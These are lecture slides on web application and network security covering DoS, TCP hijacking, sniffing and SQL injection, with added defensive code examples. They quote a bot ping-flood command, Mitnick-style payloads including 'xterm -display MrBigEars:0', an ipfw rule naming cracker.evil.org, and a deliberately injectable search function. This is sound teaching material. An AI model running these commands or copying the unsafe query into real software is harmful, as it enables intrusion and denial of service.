Web Application and network security
Rishabh Mehan
Saying Hello!!
To start off with the introduction, let's go through a few basics:
What is a Web Application?
Where is it deployed?
How can it be reached?
Web Application
Protocols
HTTP – HTTPS
FTP – SFTP
TCP
SSH
Request Methods
GET: form data encoded in the URL
POST: data is included in the body of the request

GET example:

```http
GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.mysite.com/
```

POST example:

```http
POST http://www.mysite.com/kgsearch/search.php HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.mysite.com/

catid=1
```
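As an added example (not part of the slides), a small parser that shows how the server sees the same `catid` parameter whether it arrives in the GET query string or in the POST body; the sample requests are constructed after the slide's, and the point for a defender is that both paths deliver untrusted input that must be validated the same way.

```python
from urllib.parse import parse_qs, urlsplit

def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers, body and the
    parameters it carries (query string for GET, form body for POST)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Trust only as many body bytes as Content-Length announces
    length = int(headers.get("content-length", "0"))
    body = body[:length]
    url = urlsplit(target)                      # works for absolute-form and origin-form targets
    params = parse_qs(url.query)
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        # The same parameter can also arrive in the body; merge so validation sees both
        for key, values in parse_qs(body.decode("iso-8859-1")).items():
            params.setdefault(key, []).extend(values)
    return {"method": method, "path": url.path, "version": version,
            "headers": headers, "params": params, "body": body}

# Constructed sample requests modelled on the slide (absolute-form target, as shown there)
GET_REQ = (b"GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1\r\n"
           b"Host: www.mysite.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n")
POST_REQ = (b"POST http://www.mysite.com/kgsearch/search.php HTTP/1.1\r\n"
            b"Host: www.mysite.com\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 7\r\n\r\ncatid=1")

def catid_of(raw: bytes) -> str:
    """The value the application would act on, whichever method carried it."""
    return parse_http_request(raw)["params"]["catid"][0]
```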
How a request flows
Diagram: the Client PC (10.1.0.123) sends a Request to the Server www.mybank.com (64.58.76.230) on port 80, and the Server returns a Response.
Words of Wisdom
“Every program has at least two purposes: the one for which it was written, and another for which it wasn't.”
– Alan J. Perlis
Infrastructure
Diagram labels: Browser, Web Servers, Presentation Layer, Media Store, Database Server, Customer Identification, Access Controls, Transaction Information, Core Business Data, Wireless, Application Server, Business Logic, Content Services, Network, HTTP, Web Application.
Very complex architectures, multiple platforms, multiple protocols.
Why vulnerabilities
The Web Application Security Gap
“As an Application Developer, I can build great features and functions while meeting deadlines, but I don’t know how to develop my web application with security as a feature.”
Application Developers and QA Professionals Don’t Know Security
“As a Network Security Professional, I don’t know how my company's web applications are supposed to work so I deploy a protective solution…but don’t know if it’s protecting what it’s supposed to.”
Security Professionals Don’t Know The Applications
Common security attacks and their countermeasures

| Attack | Countermeasure |
| --- | --- |
| Finding a way into the network | Firewalls |
| Exploiting software bugs, buffer overflows | Intrusion Detection Systems |
| Denial of Service | Ingress filtering, IDS |
| TCP hijacking | IPSec |
| Packet sniffing | Encryption (SSH, SSL, HTTPS) |
| Social problems | Education |
Firewalls
Basic problem: many network applications and protocols have security problems that are fixed over time. It is difficult for users to keep up with changes and keep the host secure.
Solution:
Administrators limit access to end hosts by using a firewall
The firewall is kept up-to-date by administrators
Firewalls
Diagram: Internet – Firewall – DMZ (web server, email server, web proxy, etc.) – Firewall – Intranet
Firewalls
What does a firewall rule look like? Depends on the firewall used.
Example (ipfw): /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
Other examples: WinXP & Mac OS X have built-in and third-party firewalls, with different graphical user interfaces and varying amounts of complexity and power.
Denial of Service
Purpose: make a network service unusable, usually by overloading the server or network.
Many different kinds of DoS attacks: SYN flooding, SMURF, distributed attacks
Denial of Service
SYN flooding attack: send SYN packets with a bogus source address. Why?
The server responds with SYN ACK and keeps state about the TCP half-open connection; eventually, server memory is exhausted with this state.
Solution: use “SYN cookies”. In response to a SYN, create a special “cookie” for the connection, and forget everything else. Then the forgotten information can be recreated when the ACK comes in from a legitimate connection.
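The SYN-cookie idea above, worked through as an added example (this is illustrative code, not a kernel implementation): the server's ISN in the SYN-ACK is a keyed hash of the connection 4-tuple, the client's ISN and a coarse time slot, with the client's MSS squeezed into two bits, so nothing is stored for the half-open connection and the ACK can be verified statelessly. The secret key, the 64-second slot size and the MSS table are assumptions chosen for the example.

```python
import hashlib, hmac, time

SECRET = b"constructed-per-boot-server-secret"   # constructed; a real stack draws this at boot
MSS_TABLE = [536, 1220, 1460]                     # MSS values we can encode in two bits

def _cookie_mac(src, sport, dst, dport, client_isn, slot):
    """Keyed hash over the 4-tuple, the client's ISN and the time slot."""
    msg = f"{src}:{sport}>{dst}:{dport}|{client_isn}|{slot}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:4], "big")

def _slot(now):
    return (int(now) >> 6) & 0x1F               # 64-second slots, 5 bits

def make_syn_cookie(src, sport, dst, dport, client_isn, mss, now=None):
    """Server ISN for the SYN-ACK: 5-bit time slot | 2-bit MSS index | 25-bit MAC.
    Nothing is stored for the half-open connection."""
    now = time.time() if now is None else now
    slot = _slot(now)
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    mac = _cookie_mac(src, sport, dst, dport, client_isn, slot) & 0x1FFFFFF
    return (slot << 27) | (mss_idx << 25) | mac

def check_syn_cookie(src, sport, dst, dport, seq_num, ack_num, now=None):
    """Validate the client's ACK (seq = client ISN + 1, ack = cookie + 1) and
    rebuild the forgotten state. Returns the MSS, or None if bad or stale."""
    now = time.time() if now is None else now
    cookie = (ack_num - 1) & 0xFFFFFFFF
    client_isn = (seq_num - 1) & 0xFFFFFFFF
    slot, cur = cookie >> 27, _slot(now)
    if slot not in (cur, (cur - 1) & 0x1F):      # only the current and previous slot are live
        return None
    expected = _cookie_mac(src, sport, dst, dport, client_isn, slot) & 0x1FFFFFF
    if (cookie & 0x1FFFFFF) != expected:
        return None
    return MSS_TABLE[(cookie >> 25) & 0x3]
```

A flood of SYNs with bogus source addresses now costs the server a hash per packet and no memory, because the ACK that would complete the handshake never arrives for those addresses.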
Denial of Service
SMURF: the source IP address of a broadcast ping is forged, so a large number of machines respond back to the victim, overloading it.
Denial of Service
Distributed Denial of Service: same techniques as regular DoS, but on a much larger scale.
Example: Sub7Server Trojan and IRC bots. Infect a large number of machines with a “zombie” program; the zombie program logs into an IRC channel and awaits commands.
Example: bot command !p4 207.71.92.193. Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000, which sends 10,000 64k packets to the host (655MB!)
Read more at: http://grc.com/dos/grcdos.htm
TCP Attacks
Recall how IP works: end hosts create IP packets and routers process them based on the destination address alone.
Problem: end hosts may lie about other fields which do not affect delivery. Source address: a host may trick the destination into believing that the packet is from a trusted source, especially for applications which use IP addresses as a simple authentication method.
Solution: use better authentication methods
TCP Attacks
TCP connections have associated state: starting sequence numbers, port numbers.
Problem: what if an attacker learns these values? Port numbers are sometimes well known to begin with (ex. HTTP uses port 80). Sequence numbers are sometimes chosen in very predictable ways.
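As an added example (not from the slides), the two ISN schemes side by side: a global counter of the kind the slide warns about, and the RFC 6528 construction that current stacks use, where the ISN is a clock plus a keyed hash of the connection 4-tuple. The `looks_predictable` check is a simple audit one would run over ISNs sampled from successive connections; the secret key and the 64000 counter step are assumptions for the example, and HMAC-SHA256 stands in for the hash the RFC suggests.

```python
import hashlib, hmac, statistics

SECRET = b"constructed-secret-drawn-at-boot"   # constructed; a real stack picks a fresh one at boot

def rfc6528_isn(local_ip, local_port, remote_ip, remote_port, usec_clock, secret=SECRET):
    """ISN = M + F(localip, localport, remoteip, remoteport, secret) mod 2^32,
    where M is a clock ticking every 4 microseconds and F is a keyed hash
    (RFC 6528; HMAC-SHA256 is used here in place of the RFC's MD5 suggestion)."""
    m = (usec_clock // 4) & 0xFFFFFFFF
    msg = f"{local_ip}|{local_port}|{remote_ip}|{remote_port}".encode()
    f = int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:4], "big")
    return (m + f) & 0xFFFFFFFF

def counter_isn(connection_number):
    """The old scheme the slide warns about: a global counter bumped by a fixed
    amount for every new connection, so one observed ISN predicts the next."""
    return (connection_number * 64000) & 0xFFFFFFFF

def looks_predictable(isns, tolerance=1024):
    """Audit check over ISNs sampled from successive connections: if the step
    between them is near-constant, an off-path attacker can guess the next one."""
    deltas = [(b - a) & 0xFFFFFFFF for a, b in zip(isns, isns[1:])]
    return statistics.pstdev(deltas) < tolerance
```

With RFC 6528 the ISN for one fixed 4-tuple still advances monotonically with the clock (so an old connection's segments are not confused with a new one's), but ISNs seen across different connections no longer reveal each other.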
TCP Attacks
If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
The attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source. Ex. instead of downloading and running a new program, you download a virus and execute it.
TCP Attacks
Say hello to Alice, Bob and Mr. Big Ears
TCP Attacks
Alice and Bob have an established TCP connection
TCP Attacks
Mr. Big Ears lies on the path between Alice and Bob on the network. He can intercept all of their packets.
TCP Attacks
First, Mr. Big Ears must drop all of Alice’s packets, since they must not be delivered to Bob (why?)
Diagram: Packets → The Void
TCP Attacks
Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)
Diagram: ISN, SRC=Alice
TCP Attacks
What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
Can just DoS Alice instead of dropping her packets
Can just send guesses of what the ISN is until it is accepted
How do you know when the ISN is accepted? Mitnick: payload is “add self to .rhosts”. Or, “xterm -display MrBigEars:0”
TCP Attacks
Why are these types of TCP attacks so dangerous?
Diagram: Web server, Malicious user, Trusting web client
TCP Attacks
How do we prevent this? IPSec:
Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
Packet Sniffing
Recall how Ethernet works: when someone wants to send a packet to someone else, they put the bits on the wire with the destination MAC address, and remember that other hosts are listening on the wire to detect collisions.
It couldn’t get any easier to figure out what data is being transmitted over the network!
Packet Sniffing
How can we protect ourselves?
SSH, not Telnet: many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!). Now that I have told you this, please do not exploit this information. Packet sniffing is, by the way, prohibited by Computing Services.
HTTP over SSL: especially when making purchases with credit cards!
SFTP, not FTP: unless you really don’t care about the password or data. Can also use KerbFTP (download from MyAndrew).
IPSec: provides network-layer confidentiality
Web Application Vulnerabilities
Web application vulnerabilities occur in multiple areas.
Platform: Known Vulnerabilities
Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
Application: Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site scripting
What the #@$& is happening???
Chart: share of vulnerabilities by category (XSS, SQL Injection, Auth, Input Validation, File Include, Info Disclosure), percentage scale 0–50.
Web Application Vulnerabilities
Platform: Known Vulnerabilities
Platform: known vulnerabilities can be exploited immediately with a minimum amount of skill or experience (“script kiddies”)
Most easily defendable of all web vulnerabilities
MUST have streamlined patching procedures
Web Application Vulnerabilities
Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
Administration:
• Less easily corrected than known issues
• Require increased awareness
• More than just configuration, must be aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings
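The remnant and backup file problem above, turned into the audit an administrator can run over the web root before it goes live; this is an added example, not a tool the slides describe. The suffix and name lists are assumptions for the example, and `build_sample_webroot` creates a constructed temporary tree (including a leaked connection string in a `.bak` copy) so the check can be tried offline.

```python
import os, tempfile
from pathlib import Path

# Names and suffixes that commonly betray editors, deployments and backups (assumed list)
RISKY_SUFFIXES = (".bak", ".old", ".orig", ".swp", "~", ".save", ".tmp", ".zip", ".tar.gz")
RISKY_NAMES = {".git", ".svn", ".htpasswd", "phpinfo.php"}

def find_remnant_files(webroot: str) -> list:
    """Walk a web root and return paths (relative to it, POSIX style) that look
    like backup or leftover files a web server would happily serve as plain text."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        for d in dirnames:
            if d in RISKY_NAMES:                      # e.g. an exposed .git directory
                hits.append(Path(rel_dir, d).as_posix())
        for f in filenames:
            if f in RISKY_NAMES or f.endswith(RISKY_SUFFIXES) or f.startswith("#"):
                hits.append(Path(rel_dir, f).as_posix())
    return sorted(hits)

def build_sample_webroot() -> str:
    """Constructed sample tree for the demonstration (not a real deployment)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.php": "<?php echo 'hi'; ?>",
        "index.php.bak": "<?php $db = 'mysql://app:s3cret@db/app'; ?>",  # leaks connection string
        "config.php~": "<?php $secret = 'x'; ?>",                        # editor backup
        "includes/db.php": "<?php ?>",
        "includes/db.php.old": "<?php ?>",
        "site-backup.zip": "PK",
        ".git/HEAD": "ref: refs/heads/main",
    }
    for rel, content in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return root
```

Anything the audit lists should be deleted from the web root or, at minimum, denied by the server configuration; the `.bak` copy of a live PHP file is served as text rather than executed, which is exactly how source and connection strings leak.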
Web Application Vulnerabilities
Application
Application Programming:
• Common coding techniques do not necessarily include security
• Input is assumed to be valid, but not tested
• Unexamined input from a browser can inject scripts into a page for replay against later visitors
• Unhandled error messages reveal application and database structures
• Unchecked database calls can be ‘piggybacked’ with a hacker’s own database call, giving direct access to business data through a web browser
Application: Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site scripting
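The “unchecked database call” point above, shown as an added example (not the slides' code) with the slide's `catid` search parameter: the first function pastes browser input into the SQL text, so a value containing a quote rewrites the WHERE clause and the `internal = 0` restriction no longer applies as written; the second validates the input against what the application expects and binds it as a parameter. The in-memory SQLite database and its rows are constructed for the demonstration.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample database for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, catid INTEGER, name TEXT, internal INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", [
        (1, 1, "public widget", 0),
        (2, 2, "public gadget", 0),
        (3, 9, "unreleased prototype", 1),
    ])
    return db

def search_unsafe(db, catid: str) -> list:
    """Slide-style code: the browser-supplied catid is pasted into the SQL text,
    so whatever the user sends becomes part of the query."""
    sql = (f"SELECT name FROM products WHERE catid = '{catid}' AND internal = 0 "
           f"ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def search_safe(db, catid: str) -> list:
    """Hardened: validate the input against what the application expects and bind
    it as a parameter, so the database never interprets it as SQL."""
    if not catid.isdigit():
        raise ValueError("catid must be a non-negative integer")
    sql = "SELECT name FROM products WHERE catid = ? AND internal = 0 ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(catid),))]
```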
Examples
http://demo.testfire.net/
http://chat.wallhood.com/moving/moving/images/
How to Secure Web Applications
Incorporate security into the lifecycle: apply information security principles to all software development efforts
Educate: issue awareness, training, etc…
Are We Still Secure?
LOLNO
Questions?